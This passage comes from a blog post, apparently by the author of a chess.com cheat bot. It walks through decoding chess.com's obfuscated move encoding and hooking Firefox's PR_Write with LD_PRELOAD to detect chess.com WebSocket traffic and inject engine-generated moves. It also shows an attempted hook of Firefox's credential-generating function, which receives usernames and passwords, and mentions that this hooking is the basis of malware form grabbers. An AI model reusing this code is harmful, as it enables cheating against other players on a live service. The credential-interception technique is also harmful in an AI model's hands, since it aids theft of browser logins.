<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">z98075</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">z00e3d</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">z5b3be</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">z2b70d</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">z2ba00</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"r"</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">z98075</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">ze4b5e</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">z5b3be</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">z2b70d</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">1</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">z2ba00</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"r"</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">z98075</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">z91a79</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">z5b3be</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">z2b70d</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="mi">1</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">z2ba00</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"b"</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">z98075</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">zc21d8</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">z5b3be</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">z2b70d</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">z2ba00</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"b"</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">z98075</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">zaa236</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">z5b3be</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">z2b70d</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">1</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">z2ba00</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"b"</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">z5b3be</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="n">null</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">var</span><span class="w"> </span><span class="n">zd2788</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">ze2e37</span><span class="p">.</span><span class="n">charAt</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">zd2788</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">7</span><span class="p">)</span><span class="w"></span>
<span class="w"> </span><span class="n">zbd29b</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">String</span><span class="p">.</span><span class="n">fromCharCode</span><span class="p">(</span><span class="n">z5b3be</span><span class="p">)</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="s">"8"</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">else</span><span class="w"> </span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">zd2788</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">2</span><span class="p">)</span><span class="w"></span>
<span class="w"> </span><span class="n">zbd29b</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">String</span><span class="p">.</span><span class="n">fromCharCode</span><span class="p">(</span><span class="n">z5b3be</span><span class="p">)</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="s">"1"</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">else</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">null</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">zbd29b</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">ze8500</span><span class="p">[</span><span class="s">"_"</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">z98075</span><span class="p">];</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">zbd29b</span><span class="p">)</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">null</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">var</span><span class="w"> </span><span class="n">z3cbd9</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">{};</span><span class="w"></span>
<span class="w"> </span><span class="n">z3cbd9</span><span class="p">[</span><span class="s">"fromArea"</span><span class="p">]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">ze2e37</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">z3cbd9</span><span class="p">[</span><span class="s">"toArea"</span><span class="p">]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">zbd29b</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">z3cbd9</span><span class="p">[</span><span class="s">"additionalInfo"</span><span class="p">]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">z2ba00</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">z3cbd9</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">},</span><span class="n">za902f</span><span class="o">:</span><span class="w"> </span><span class="n">function</span><span class="p">(</span><span class="n">zcc2ef</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">z6439d</span><span class="p">[</span><span class="n">zcc2ef</span><span class="p">];</span><span class="w"></span>
<span class="w"> </span><span class="p">},</span><span class="n">z398d0</span><span class="o">:</span><span class="w"> </span><span class="n">function</span><span class="p">(</span><span class="n">zccfb6</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">this</span><span class="p">.</span><span class="n">ze8500</span><span class="p">[</span><span class="s">"_"</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">zccfb6</span><span class="p">];</span><span class="w"></span>
<span class="w"> </span><span class="p">}};</span><span class="w"></span>
<span class="p">})();</span><span class="w"></span>
</code></pre></div>
<p>Before I forget it: Why the hell are you guys from chess.com obfuscating
your JS code? I mean it probably makes sense to pack and encrypt game
binaries of big games (that are still very fast cracked by talanted
crackers), but why blur Javascript? It's just too easy to reverse the
logic with existing tools such as DevTools or Firebug, so why even
bother?</p>
<p>No with the function above, we can look the move up which reveals "mC"
== "e3e5". So we now how to encode/decode the move notation. Let's
inspect the next message:</p>
<p><strong>4. Writing my first move (outgoing Message)</strong></p>
<div class="highlight"><pre><span></span><code>[{"channel":"/service/user","data":{"move":{"gid":709341692,"seq":1,"uid":"EatingSpiders","move":"YI","clock":600,"clockms":60000,"squared":false},"sid":"gserv","tid":"Move"},"id":"259","clientId":"6djua267g6n8ydja21m8yhztj3gtpx"}]
</code></pre></div>
<p>Nothing new here, this is just my browser that send the move "YI" to the
game server. You can look it up now on your own, since I have identified
the decoding mechanism above.</p>
<p>Now the next messages are just essentially like the previous two (with
status <em>in_progress</em> in place of the initial <em>starting</em>), always
receiving the opponents move and then I sending my move. So we have all
knowledge about the protocol that we need, now let's discuss how I
finally implemented my bot.</p>
<h3 id="chap_workings">How the bot is implemented</h3>
<p>As discussed, I chose to hook into low level networking functions in the
browser. I chose firefox as my hooking target, because there already
exist quite many examples on how to hook networking functions in
firefox.</p>
<p>So the technique is basically known as the LD_PRELOAD trick. You can
learn about it on this short <a href="http://stackoverflow.com/questions/426230/what-is-the-ld-preload-trick">stackoverflow.com
explanation</a>.</p>
<p>There are other, better ways to hook library functions, I really
recommend you to read <a href="http://www.codeproject.com/Articles/70302/Redirecting-functions-in-shared-ELF-libraries">this wonderful
article</a>
about <em>redirecting shared functions in ELF binaries</em>. But you should
have profound knowledge of the <em>ELF</em> format in order to follow;</p>
<p>First, I tried to hook directly into the specific HTTP and WebSocket
functions in the firefox network library called <em>netwerk</em> or
<a href="https://developer.mozilla.org/en/docs/Necko">necko</a>. But firefox is
written in C++ and therefore it's not so simple to use the LD_PRELOAD
trick, because the functions/class names are
<a href="http://en.wikipedia.org/wiki/Name_mangling#Standardised_name_mangling_in_C.2B.2B">mangled</a>.
I desperately tried to hook such C++ code and I also managed to to so in
a simple example. It looks something like below, but it couldn't
actually log some calls. Maybe because the function was never called.
Here I try to hook into the <code>GenerateCredentials()</code> function of the
<code>nsHttpBasicAuth</code> class. I assume the function fires when you enter
HttpAuth credentials in a browser.</p>
<div class="highlight"><pre><span></span><code><span class="cp">#include </span>
<span class="cp">#include </span>
<span class="cp">#include </span>
<span class="cp">#include</span>
<span class="cp">#ifndef _GNU_SOURCE</span>
<span class="cp">#define _GNU_SOURCE</span>
<span class="cp">#endif</span>
<span class="n">namespace</span><span class="w"> </span><span class="n">mozilla</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="n">namespace</span><span class="w"> </span><span class="n">net</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="k">typedef</span><span class="w"> </span><span class="kt">unsigned</span><span class="w"> </span><span class="kt">short</span><span class="w"> </span><span class="n">char16_t</span><span class="p">;</span><span class="w"></span>
<span class="k">typedef</span><span class="w"> </span><span class="kt">unsigned</span><span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="kt">uint32_t</span><span class="p">;</span><span class="w"></span>
<span class="k">typedef</span><span class="w"> </span><span class="kt">unsigned</span><span class="w"> </span><span class="kt">long</span><span class="w"> </span><span class="n">PRUint32</span><span class="p">;</span><span class="w"> </span>
<span class="k">typedef</span><span class="w"> </span><span class="n">PRUint32</span><span class="w"> </span><span class="n">nsresult</span><span class="p">;</span><span class="w"></span>
<span class="cp">#define NS_IMETHODIMP NS_IMETHODIMP_(nsresult)</span>
<span class="n">class</span><span class="w"> </span><span class="n">nsIHttpAuthenticator</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="p">};</span><span class="w"></span>
<span class="n">class</span><span class="w"> </span><span class="n">nsISupports</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="p">};</span><span class="w"></span>
<span class="n">class</span><span class="w"> </span><span class="n">nsHttpBasicAuth</span><span class="w"> </span><span class="o">:</span><span class="w"> </span><span class="n">public</span><span class="w"> </span><span class="n">nsIHttpAuthenticator</span><span class="w"></span>
<span class="p">{</span><span class="w"></span>
<span class="n">public</span><span class="o">:</span><span class="w"></span>
<span class="w"> </span><span class="n">nsHttpBasicAuth</span><span class="p">();</span><span class="w"></span>
<span class="w"> </span><span class="n">virtual</span><span class="w"> </span><span class="o">~</span><span class="n">nsHttpBasicAuth</span><span class="p">();</span><span class="w"></span>
<span class="w"> </span><span class="kt">unsigned</span><span class="w"> </span><span class="kt">long</span><span class="w"> </span><span class="nf">GenerateCredentials</span><span class="p">(</span><span class="kt">void</span><span class="w"> </span><span class="o">*</span><span class="n">authChannel</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="k">const</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">challenge</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="kt">bool</span><span class="w"> </span><span class="n">isProxyAuth</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="k">const</span><span class="w"> </span><span class="n">char16_t</span><span class="w"> </span><span class="o">*</span><span class="n">domain</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="k">const</span><span class="w"> </span><span class="n">char16_t</span><span class="w"> </span><span class="o">*</span><span class="n">user</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="k">const</span><span class="w"> </span><span class="n">char16_t</span><span class="w"> </span><span class="o">*</span><span class="n">password</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">nsISupports</span><span class="w"> </span><span class="o">**</span><span class="n">sessionState</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">nsISupports</span><span class="w"> </span><span class="o">**</span><span class="n">continuationState</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="kt">uint32_t</span><span class="w"> </span><span class="o">*</span><span class="n">aFlags</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">**</span><span class="n">creds</span><span class="p">);</span><span class="w"></span>
<span class="p">};</span><span class="w"></span>
<span class="n">nsHttpBasicAuth</span><span class="o">::</span><span class="n">nsHttpBasicAuth</span><span class="p">()</span><span class="w"></span>
<span class="p">{</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
<span class="n">nsHttpBasicAuth</span><span class="o">::~</span><span class="n">nsHttpBasicAuth</span><span class="p">()</span><span class="w"></span>
<span class="p">{</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
<span class="kt">unsigned</span><span class="w"> </span><span class="kt">long</span><span class="w"></span>
<span class="n">nsHttpBasicAuth</span><span class="o">::</span><span class="n">GenerateCredentials</span><span class="p">(</span><span class="kt">void</span><span class="w"> </span><span class="o">*</span><span class="n">authChannel</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="k">const</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">challenge</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="kt">bool</span><span class="w"> </span><span class="n">isProxyAuth</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="k">const</span><span class="w"> </span><span class="n">char16_t</span><span class="w"> </span><span class="o">*</span><span class="n">domain</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="k">const</span><span class="w"> </span><span class="n">char16_t</span><span class="w"> </span><span class="o">*</span><span class="n">user</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="k">const</span><span class="w"> </span><span class="n">char16_t</span><span class="w"> </span><span class="o">*</span><span class="n">password</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">nsISupports</span><span class="w"> </span><span class="o">**</span><span class="n">sessionState</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">nsISupports</span><span class="w"> </span><span class="o">**</span><span class="n">continuationState</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="kt">uint32_t</span><span class="w"> </span><span class="o">*</span><span class="n">aFlags</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">**</span><span class="n">creds</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stdout</span><span class="p">,</span><span class="w"> </span><span class="s">"[+] GenerateCredentials hooked!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="c1">// define the class member pointer tyep</span>
<span class="w"> </span><span class="k">typedef</span><span class="w"> </span><span class="kt">unsigned</span><span class="w"> </span><span class="nf">long</span><span class="w"> </span><span class="p">(</span><span class="n">nsHttpBasicAuth</span><span class="o">::*</span><span class="n">hookedMethod</span><span class="p">)(</span><span class="kt">void</span><span class="w"> </span><span class="o">*</span><span class="p">,</span><span class="w"> </span><span class="k">const</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="p">,</span><span class="w"> </span><span class="kt">bool</span><span class="p">,</span><span class="w"> </span><span class="k">const</span><span class="w"> </span><span class="n">char16_t</span><span class="w"> </span><span class="o">*</span><span class="p">,</span><span class="w"> </span><span class="k">const</span><span class="w"> </span><span class="n">char16_t</span><span class="w"> </span><span class="o">*</span><span class="p">,</span><span class="w"> </span><span class="k">const</span><span class="w"> </span><span class="n">char16_t</span><span class="w"> </span><span class="o">*</span><span class="p">,</span><span class="w"> </span><span class="n">nsISupports</span><span class="w"> </span><span class="o">**</span><span class="p">,</span><span class="w"> </span><span class="n">nsISupports</span><span class="w"> </span><span class="o">**</span><span class="p">,</span><span class="w"> </span><span class="kt">uint32_t</span><span class="w"> </span><span class="o">*</span><span class="p">,</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">**</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">static</span><span class="w"> </span><span class="n">hookedMethod</span><span class="w"> </span><span class="n">origMethod</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="kt">void</span><span class="w"> </span><span class="o">*</span><span class="n">tmpPtr</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">dlsym</span><span class="p">(</span><span class="n">RTLD_NEXT</span><span class="p">,</span><span class="w"> </span><span class="s">"_ZN7mozilla3net15nsHttpBasicAuth19GenerateCredentialsEPvPKcbPKtS6_S6_PPNS0_11nsISupportsES9_PjPPc"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">tmpPtr</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="nb">NULL</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"dlsym() couldn't located the symbol :( </span><span class="se">\n</span><span class="s">"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">exit</span><span class="p">(</span><span class="n">EXIT_FAILURE</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">origMethod</span><span class="p">,</span><span class="w"> </span><span class="o">&</span><span class="n">tmpPtr</span><span class="p">,</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="o">&</span><span class="n">tmpPtr</span><span class="p">));</span><span class="w"></span>
<span class="w"> </span><span class="c1">// call the original method</span>
<span class="w"> </span><span class="kt">unsigned</span><span class="w"> </span><span class="kt">long</span><span class="w"> </span><span class="n">retVal</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">this</span><span class="o">->*</span><span class="n">origMethod</span><span class="p">)(</span><span class="n">authChannel</span><span class="p">,</span><span class="w"> </span><span class="n">challenge</span><span class="p">,</span><span class="w"> </span><span class="n">isProxyAuth</span><span class="p">,</span><span class="w"> </span><span class="n">domain</span><span class="p">,</span><span class="w"> </span><span class="n">user</span><span class="p">,</span><span class="w"> </span><span class="n">password</span><span class="p">,</span><span class="w"> </span><span class="n">sessionState</span><span class="p">,</span><span class="w"> </span><span class="n">continuationState</span><span class="p">,</span><span class="w"> </span><span class="n">aFlags</span><span class="p">,</span><span class="w"> </span><span class="n">creds</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">retVal</span><span class="p">;</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>Anyways, if I could get succeed in hooking C++ functions by overcoming
the mangling issues, I would directly hook into functions found in the
mozilla source tree
<a href="http://mxr.mozilla.org/mozilla-central/source/netwerk/protocol/websocket/">/mozilla-central/source/netwerk/protocol/websocket/</a>.
It would be enormously juicy to hook into the file
<a href="http://mxr.mozilla.org/mozilla-central/source/netwerk/protocol/websocket/WebSocketChannel.cpp">WebSocketChannel.cpp</a>.
For example the function <code>void WebSocketChannel::BeginOpen()</code> on line
1061 looks like a nice start. <strong>Can anyone provide me a hooking example
for this function? That'd be awesome!</strong></p>
<p>So after some further research and giving up trying to hook C++
functions, I decided to hook into firefox's <code>PR_write()</code> and
<code>PR_read()</code> low level networking functions, implemented in plain C. If
you search for these functions in the internet, you will find lot's of
different example for form grabbers, techniques that are commonly used
by maleware writers.</p>
<p>After experimenting a little bit with these two functions, I figured out
that basically the whole freaking internet flows through them. For
instance, if you just open a browser without loading any site, a whole
bunch of meta protocols are squeezed through <code>PR_write()</code> and
<code>PR_read()</code>.</p>
<p>I assume that all possible protocols (like accessing cookies,
<em>about:blank</em>, <em>file:</em> and the like) are also handled these functions.
It's really funny what you're able to see when you hook into these
functions. To formulate it pregnant: Stuff that you thought to be
deleted after clearing the cache is happily appearing inside these two
functions...</p>
<p>Anyways, the basic C code that implements this hooking technique in form
of a shared library looks like the bottom code excerpt. You can always
visit <a href="https://github.com/NikolaiT/chess-com-cheat">my public
repository</a>, where you can
read the current state of the cheat code.</p>
<div class="highlight"><pre><span></span><code><span class="n">PRInt32</span><span class="w"> </span><span class="nf">PR_Write</span><span class="p">(</span><span class="n">PRFileDesc</span><span class="w"> </span><span class="o">*</span><span class="n">fd</span><span class="p">,</span><span class="w"> </span><span class="k">const</span><span class="w"> </span><span class="kt">void</span><span class="w"> </span><span class="o">*</span><span class="n">buf</span><span class="p">,</span><span class="w"> </span><span class="n">PRInt32</span><span class="w"> </span><span class="n">amount</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="k">static</span><span class="w"> </span><span class="n">PRInt32</span><span class="w"> </span><span class="p">(</span><span class="o">*</span><span class="n">my_PR_write</span><span class="p">)(</span><span class="n">PRFileDesc</span><span class="w"> </span><span class="o">*</span><span class="p">,</span><span class="w"> </span><span class="k">const</span><span class="w"> </span><span class="kt">void</span><span class="w"> </span><span class="o">*</span><span class="p">,</span><span class="w"> </span><span class="n">PRInt32</span><span class="p">)</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nb">NULL</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="c1">// Detect the client WebSocket connection attempt</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="p">(</span><span class="n">webSocketState</span><span class="p">.</span><span class="n">state</span><span class="w"> </span><span class="o">&</span><span class="w"> </span><span class="n">WEB_SOCKET_CONNECTION_REQUESTED</span><span class="p">)</span><span class="w"> </span><span class="o">&&</span><span class="w"> </span><span class="n">amount</span><span class="w"> </span><span class="o">></span><span class="w"> </span><span class="mi">600</span><span class="w"> </span><span class="o">&&</span><span class="w"> </span><span class="n">amount</span><span class="w"> </span><span class="o"><</span><span class="w"> </span><span class="mi">1200</span><span class="w"> </span><span class="o">&&</span><span class="w"> </span><span class="n">memContains</span><span class="p">((</span><span class="k">const</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="p">)</span><span class="n">buf</span><span class="p">,</span><span class="w"> </span><span class="n">amount</span><span class="p">,</span><span class="w"> </span><span class="s">"Upgrade: websocket"</span><span class="p">)</span><span class="w"> </span>
<span class="w"> </span><span class="o">&&</span><span class="w"> </span><span class="n">memContains</span><span class="p">((</span><span class="k">const</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="p">)</span><span class="n">buf</span><span class="p">,</span><span class="w"> </span><span class="n">amount</span><span class="p">,</span><span class="w"> </span><span class="s">"Origin: http://live.chess.com"</span><span class="p">)</span><span class="w"> </span><span class="o">&&</span><span class="w"> </span><span class="n">memContains</span><span class="p">((</span><span class="k">const</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="p">)</span><span class="n">buf</span><span class="p">,</span><span class="w"> </span><span class="n">amount</span><span class="p">,</span><span class="w"> </span><span class="s">"Sec-WebSocket-Key:"</span><span class="p">)</span><span class="w"> </span><span class="o">&&</span><span class="w"></span>
<span class="w"> </span><span class="n">memContains</span><span class="p">((</span><span class="k">const</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="p">)</span><span class="n">buf</span><span class="p">,</span><span class="w"> </span><span class="n">amount</span><span class="p">,</span><span class="w"> </span><span class="s">"Sec-WebSocket-Version: 13"</span><span class="p">))</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">webSocketState</span><span class="p">.</span><span class="n">state</span><span class="w"> </span><span class="o">|=</span><span class="w"> </span><span class="n">WEB_SOCKET_CONNECTION_REQUESTED</span><span class="p">;</span><span class="w"> </span>
<span class="cp">#if DEBUG_LEVEL >= 1</span>
<span class="w"> </span><span class="n">INFO_PRINT</span><span class="p">(</span><span class="s">"Chess.com WebSocket client request detected"</span><span class="p">,</span><span class="w"> </span><span class="n">SH_RED</span><span class="p">);</span><span class="w"></span>
<span class="cp">#endif</span>
<span class="w"> </span><span class="c1">// Also start up the Stockfish engine</span>
<span class="w"> </span><span class="c1">//INFO_PRINT("Starting the engine...", SH_BLUE);</span>
<span class="w"> </span><span class="c1">//initStockfish();</span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="cm">/*</span>
<span class="cm"> * When the WebSocket is open sniff for move packets that are between 230 and 240 bytes in size.</span>
<span class="cm"> * I observed that these synchronize with moves made and hence I assume these packetses transmit moves.</span>
<span class="cm"> * Now I just need do decrypt them and good is.</span>
<span class="cm"> */</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">((</span><span class="n">webSocketState</span><span class="p">.</span><span class="n">state</span><span class="w"> </span><span class="o">&</span><span class="w"> </span><span class="n">WEB_SOCKET_CONNECTION_REQUESTED</span><span class="p">)</span><span class="w"> </span><span class="o">&&</span><span class="w"> </span><span class="n">amount</span><span class="w"> </span><span class="o">></span><span class="w"> </span><span class="mi">210</span><span class="w"> </span><span class="o">&&</span><span class="w"> </span><span class="n">amount</span><span class="w"> </span><span class="o"><</span><span class="w"> </span><span class="mi">260</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="cp">#if DEBUG_LEVEL >= 2</span>
<span class="w"> </span><span class="n">INFO_PRINT</span><span class="p">(</span><span class="s">"PR_Write() called and buffer size suggests that this packet represents a move!"</span><span class="p">,</span><span class="w"> </span><span class="n">SH_RED</span><span class="p">);</span><span class="w"></span>
<span class="cp">#endif</span>
<span class="w"> </span><span class="c1">// Inject a engine made move and update the game state</span>
<span class="w"> </span><span class="n">modifyMove</span><span class="p">((</span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="p">)</span><span class="n">buf</span><span class="p">,</span><span class="w"> </span><span class="p">(</span><span class="kt">size_t</span><span class="p">)</span><span class="n">amount</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">my_PR_write</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">dlsym</span><span class="p">(</span><span class="n">RTLD_NEXT</span><span class="p">,</span><span class="w"> </span><span class="s">"PR_Write"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">my_PR_write</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="nb">NULL</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"dlsym() failed for PR_Write</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">exit</span><span class="p">(</span><span class="n">EXIT_FAILURE</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">PRInt32</span><span class="w"> </span><span class="n">retVal</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="o">*</span><span class="n">my_PR_write</span><span class="p">)(</span><span class="n">fd</span><span class="p">,</span><span class="w"> </span><span class="n">buf</span><span class="p">,</span><span class="w"> </span><span class="n">amount</span><span class="p">);</span><span class="w"></span>
